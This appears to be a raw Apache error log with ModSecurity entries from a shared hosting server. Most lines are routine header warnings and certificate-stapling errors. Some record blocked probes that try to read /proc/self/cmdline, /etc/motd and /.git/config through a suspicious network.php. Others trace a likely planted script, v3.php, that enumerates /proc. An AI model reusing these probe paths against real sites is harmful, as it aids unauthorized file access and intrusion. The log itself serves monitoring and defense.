[Mon May 11 20:07:44.937864 2026] [security2:error] [pid 1501883:tid 1501903] [client 101.32.52.164:38030] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/"] [unique_id "agIa8DP5Q_-MBliRCAxXOgAAABI"]
[Mon May 11 20:07:48.058305 2026] [security2:error] [pid 1501831:tid 1501842] [client 43.157.147.3:41536] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-bali/salon-bis-bali/"] [unique_id "agIa9FNddpkriGUb6ZVmlgAAAQk"]
[Mon May 11 20:07:49.196752 2026] [security2:error] [pid 1516058:tid 1516113] [client 101.32.52.164:43634] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/"] [unique_id "agIa9SMeXtzav-mi9SygDgAAANc"], referer: http://homin.fr
[Mon May 11 20:07:52.900621 2026] [security2:error] [pid 1501831:tid 1501837] [client 43.157.147.3:49008] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2025/06/salon-bis-bali-scaled.jpeg"] [unique_id "agIa-FNddpkriGUb6ZVmmQAAAQQ"], referer: https://rentparadise.fr/accommodation/lodge-bali/salon-bis-bali/
[Mon May 11 20:07:55.394267 2026] [security2:error] [pid 1501883:tid 1501904] [client 43.133.220.37:57678] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agIa-zP5Q_-MBliRCAxXQgAAABM"]
[Mon May 11 20:08:16.469556 2026] [security2:error] [pid 1516058:tid 1516104] [client 124.156.225.181:54814] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIbECMeXtzav-mi9SygMgAAAM4"]
[Mon May 11 20:08:23.678185 2026] [security2:error] [pid 1516058:tid 1516090] [client 216.73.216.110:30301] ModSecurity: Warning. Matched phrase "proc/self/cmdline" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/cmdline found within ARGS:filesrc: /proc/self/cmdline"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIbFyMeXtzav-mi9SygNQAAAMA"]
[Mon May 11 20:08:23.679698 2026] [security2:error] [pid 1516058:tid 1516090] [client 216.73.216.110:30301] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIbFyMeXtzav-mi9SygNQAAAMA"]
[Mon May 11 20:08:23.772529 2026] [security2:error] [pid 1516058:tid 1516090] [client 216.73.216.110:30301] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIbFyMeXtzav-mi9SygNQAAAMA"]
[Mon May 11 20:08:34.537989 2026] [security2:error] [pid 1502013:tid 1502058] [client 34.127.56.242:48996] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "happy-baby-box.fr"] [uri "/.git/config"] [unique_id "agIbIpYn-x0CHsbEbP2dFwAAAIg"]
[Mon May 11 20:08:34.538253 2026] [security2:error] [pid 1502013:tid 1502058] [client 34.127.56.242:48996] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "happy-baby-box.fr"] [uri "/.git/config"] [unique_id "agIbIpYn-x0CHsbEbP2dFwAAAIg"]
[Mon May 11 20:08:34.538679 2026] [security2:error] [pid 1502013:tid 1502058] [client 34.127.56.242:48996] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIbIpYn-x0CHsbEbP2dFwAAAIg"]
[Mon May 11 20:08:49.716445 2026] [security2:error] [pid 1534836:tid 1534890] [client 43.128.87.4:54638] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIbMdeaRXe5lR8y0ZODzwAAAVM"]
[Mon May 11 20:08:54.546698 2026] [security2:error] [pid 1516058:tid 1516094] [client 34.141.141.80:38524] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/.git/config"] [unique_id "agIbNiMeXtzav-mi9SygZgAAAMQ"]
[Mon May 11 20:08:54.547722 2026] [security2:error] [pid 1516058:tid 1516094] [client 34.141.141.80:38524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/.git/config"] [unique_id "agIbNiMeXtzav-mi9SygZgAAAMQ"]
[Mon May 11 20:08:54.636476 2026] [security2:error] [pid 1516058:tid 1516094] [client 34.141.141.80:38524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIbNiMeXtzav-mi9SygZgAAAMQ"]
[Mon May 11 20:09:08.316384 2026] [ssl:error] [pid 1511173:tid 1511187] (EAI 2)Name or service not known: [client 170.106.192.208:44192] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 20:09:08.316545 2026] [ssl:error] [pid 1511173:tid 1511187] AH01941: stapling_renew_response: responder error
[Mon May 11 20:09:08.546736 2026] [security2:error] [pid 1511173:tid 1511187] [client 170.106.192.208:44192] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/"] [unique_id "agIbRPjVc-A-CSptvm1iMAAAAEs"], referer: http://www.happy-baby-box.fr
[Mon May 11 20:09:09.698516 2026] [ssl:error] [pid 1516058:tid 1516091] (EAI 2)Name or service not known: [client 170.106.192.208:46242] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 20:09:09.698643 2026] [ssl:error] [pid 1516058:tid 1516091] AH01941: stapling_renew_response: responder error
[Mon May 11 20:09:10.044076 2026] [security2:error] [pid 1516058:tid 1516091] [client 170.106.192.208:46242] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agIbRiMeXtzav-mi9SygdAAAAME"], referer: https://www.happy-baby-box.fr/
[Mon May 11 20:09:23.781666 2026] [security2:error] [pid 1502013:tid 1502050] [client 43.133.220.37:38086] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/biere/"] [unique_id "agIbU5Yn-x0CHsbEbP2dPAAAAJg"]
[Mon May 11 20:09:38.315630 2026] [security2:error] [pid 1502013:tid 1502049] [client 216.73.216.110:46583] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: /base64 found within ARGS:filesrc: //usr/bin/base64"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIbYpYn-x0CHsbEbP2dWgAAAJc"]
[Mon May 11 20:09:38.317049 2026] [security2:error] [pid 1502013:tid 1502049] [client 216.73.216.110:46583] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIbYpYn-x0CHsbEbP2dWgAAAJc"]
[Mon May 11 20:09:38.417064 2026] [security2:error] [pid 1502013:tid 1502049] [client 216.73.216.110:46583] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIbYpYn-x0CHsbEbP2dWgAAAJc"]
[Mon May 11 20:10:13.554680 2026] [authz_core:error] [pid 1511173:tid 1511181] [client 216.73.216.110:34604] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/template/default/auth/error_log
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704257/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704257/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704257/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704257/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704257/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704257/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:10:33.408485 2026] [security2:error] [pid 1516058:tid 1516101] [client 49.233.45.47:32890] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/"] [unique_id "agIbmSMeXtzav-mi9SygwgAAAMs"]
[Mon May 11 20:10:36.779735 2026] [security2:error] [pid 1501831:tid 1501840] [client 49.233.45.47:35774] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agIbnFNddpkriGUb6ZVnqQAAAQc"], referer: http://habilis.space
[Mon May 11 20:10:52.368056 2026] [security2:error] [pid 1534836:tid 1534893] [client 43.163.104.54:50468] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations/"] [unique_id "agIbrNeaRXe5lR8y0ZOEMAAAAVY"]
[Mon May 11 20:10:59.578242 2026] [security2:error] [pid 1502013:tid 1502049] [client 43.163.85.226:45850] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agIbs5Yn-x0CHsbEbP2dzQAAAJc"]
[Mon May 11 20:11:20.365338 2026] [ssl:error] [pid 1534836:tid 1534871] (EAI 2)Name or service not known: [client 198.235.24.169:61614] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:11:20.365446 2026] [ssl:error] [pid 1534836:tid 1534871] AH01941: stapling_renew_response: responder error
[Mon May 11 20:11:20.450741 2026] [ssl:error] [pid 1511173:tid 1511187] (EAI 2)Name or service not known: [client 198.235.24.169:61624] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:11:20.451001 2026] [ssl:error] [pid 1511173:tid 1511187] AH01941: stapling_renew_response: responder error
[Mon May 11 20:11:28.063094 2026] [security2:error] [pid 1501883:tid 1501906] [client 43.153.113.127:50156] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agIb0DP5Q_-MBliRCAxYAwAAABU"]
[Mon May 11 20:12:33.310481 2026] [authz_core:error] [pid 1501831:tid 1501845] [client 47.128.28.156:58484] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/widgets/error_log
PHP Warning:  filesize(): stat failed for /proc/690/task/690/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/690/task/690/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/690/task/690/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/690/task/690/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/690/task/690/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/690/task/690/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:13:29.341695 2026] [security2:error] [pid 1502013:tid 1502043] [client 216.73.216.110:64869] ModSecurity: Warning. Matched phrase "etc/motd" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/motd found within ARGS:filesrc: /etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIcSZYn-x0CHsbEbP2eaAAAAJA"]
[Mon May 11 20:13:29.342340 2026] [security2:error] [pid 1502013:tid 1502043] [client 216.73.216.110:64869] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIcSZYn-x0CHsbEbP2eaAAAAJA"]
[Mon May 11 20:13:29.435334 2026] [security2:error] [pid 1502013:tid 1502043] [client 216.73.216.110:64869] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIcSZYn-x0CHsbEbP2eaAAAAJA"]
[Mon May 11 20:14:00.724766 2026] [autoindex:error] [pid 1501883:tid 1501894] [client 13.89.125.25:59978] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:14:10.785774 2026] [:error] [pid 1502013:tid 1502050] [client 34.198.2.0:38653] File does not exist: /home/domaine1/public_html/erreur.php
PHP Warning:  filesize(): stat failed for /proc/914/task/914/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/914/task/914/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/914/task/914/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/914/task/914/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/914/task/914/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/914/task/914/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/228/task/228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/228/task/228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
